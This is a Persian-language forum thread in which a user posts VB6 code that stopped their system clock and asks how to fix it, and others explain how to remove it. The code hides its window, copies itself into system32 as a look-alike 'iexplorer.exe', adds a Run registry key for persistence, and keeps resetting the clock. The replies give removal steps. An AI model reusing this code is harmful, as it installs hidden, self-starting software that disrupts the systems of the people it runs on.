سلام
وقت بخیر !
با اجرای این کد ساعت سیستم من از کار افتاده
حالا چطوری میتونم به کارش بندازم ؟







Private Sub Form_Load()
On Error Resume Next
Me.Hide
App.TaskVisible = False
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\system32\iexplorer.exe"
Set reg = CreateObject("wscript.shell")
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURR ENTVERSION\RUN\" & App.EXEName, "C:\WINDOWS\system32\iexplorer.exe"
End Sub
Private Sub Timer1_Timer()
Time = "00:00:00"
End Sub






ممنونم

;

Enabled کنترل Timer رو False کن . درست میشه . :لبخند:

اون قسمت اول هم که باعث قرار گرفتن برنامه در Startup ویندوز در رجیستری میشه .

دوست عزیز برنامه شما در این مسیر کپی شده و در رجیستری نوشته شده

شما باید اونو از توی رجیستری پاک کنین

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURR ENTVERSION\RUN

اینم آدرس رجیستری

FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\system32\iexplorer.exe"


این خط کد رو هم مد نظر داشته باشین

شما باید ابتدا برنامه رو از رجیستری پاک کنید
بعدش برنامه رو از این آدرس پاک کنید
C:\WINDOWS\system32\iexplorer.exe

شما باید ابتدا برنامه رو از رجیستری پاک کنید
بعدش برنامه رو از این آدرس پاک کنید
C:\WINDOWS\system32\iexplorer.exe

خوب این که معلومه ابتدا باید برنامه از رجیستری برداشته بشه بعد فایل برنامه پاک بشه
این رو میگم چون ویروسها علاوه بر رجستری خودشون رو برای اجرای خودکار در مسیرهای دیگه هم قرار میدن و تا فایل اصلی پاک نشه میتونن باز هم اجرا بشن

خوب کدهای ویروس که مشخصه
پس مشکلی نیست

خوب کدهای ویروس که مشخصه
پس مشکلی نیست

نه دوست عزیز ایشون کل سورس رو نگذاشتن نمیشه مطمئن بود که همش این کد ها هست این که کاملا مشخصه

کافیه فایل iexplorer.exe رو از توی Task Manager ببندی و بعد همون طور که دوستان عزیز اشاره نمودن ، کلید گفته شده رو از رجیستری حذف کنی .

فایل اصلی ویروس رو هم از System32 پاک کن .

ولی اگه enabled کنترل Timer رو False می کردی خیلی بهتر بود ... :لبخند: